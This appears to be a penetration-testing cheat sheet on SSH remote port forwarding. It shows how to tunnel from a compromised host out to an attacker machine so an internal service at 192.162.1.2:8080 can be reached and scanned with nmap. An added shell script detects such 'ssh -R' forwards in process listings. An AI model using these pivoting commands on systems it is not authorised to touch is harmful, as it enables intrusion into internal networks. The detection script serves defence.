Remote Port Forwarding
If we have a shell on 172.65.0.5 but inbound SSH to it is blocked, we can open an outbound SSH connection from it to the attacker machine (172.80.0.1) and tunnel through it to any vulnerable service the target can reach, such as 192.162.1.2 on port 8080.
- Enable SSH on the attacker machine
systemctl start ssh
- On the compromised machine (-R stands for remote)
ssh -R <attacker-local-port>:<target-ip>:<target-port> <user>@<attacker-ip> -fN
ssh -R 8000:192.162.1.2:8080 user@172.80.0.1 -fN
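- To check that the tunnel is up, on the attacker machine. The forwarded service listens on the attacker-local port (8000 in the example above), not on the target port.
ss -antp | grep "8000"
sudo nmap -sS -sV 127.0.0.1 -p 8000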
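On the host that originates the tunnel, the `ssh -R` client stays in the process list, so the forward can be spotted there. The following is an added example, not part of the original notes: it parses `ps -eo pid=,args=` style lines and reports what each remote forward exposes. The function names and the sample process list are constructed, and the addresses on the second sample line are placeholders.

```shell
#!/bin/sh
# Added example: flag ssh client processes that request a remote forward (-R).

# Print "listen_port target_host target_port" for each -R spec in one command line.
# Assumption: hosts are IPv4 addresses or names (no bracketed IPv6).
parse_remote_forwards() {
    # Split the command line into words without glob expansion.
    set -f; set -- $1; set +f
    # Only ssh client invocations are of interest (sshd, scp, ... are skipped).
    case "${1##*/}" in ssh) ;; *) return 0 ;; esac
    shift
    while [ "$#" -gt 0 ]; do
        spec=""
        case "$1" in
            -R)   spec="${2:-}"; if [ "$#" -gt 1 ]; then shift; fi ;;  # "-R spec"
            -R?*) spec="${1#-R}" ;;                                    # "-Rspec"
        esac
        shift
        [ -n "$spec" ] || continue
        # Full form is [bind_address:]port:host:hostport -> keep the last three
        # fields. With fewer fields ssh acts as a SOCKS proxy on that port.
        printf '%s\n' "$spec" | awk -F: '
            NF >= 3 { print $(NF-2), $(NF-1), $NF }
            NF <  3 { print $NF, "socks", "-" }'
    done
}

# Read "PID ARGS" lines on stdin and print one finding per remote forward.
scan_ps() {
    while read -r pid args; do
        parse_remote_forwards "$args" | while read -r lport host hport; do
            printf 'pid=%s listen_port=%s target=%s:%s\n' \
                "$pid" "$lport" "$host" "$hport"
        done
    done
}

# Constructed sample of `ps -eo pid=,args=` output.
SAMPLE_PS='4121 ssh -R 8000:192.162.1.2:8080 user@172.80.0.1 -fN
4388 /usr/bin/ssh -fN -R127.0.0.1:9001:10.0.0.7:3306 ops@198.51.100.9
5010 ssh admin@10.0.0.4
5122 sshd: user@pts/0'

printf '%s\n' "$SAMPLE_PS" | scan_ps
```

On a live host, feed it with `ps -eo pid=,args= | scan_ps`.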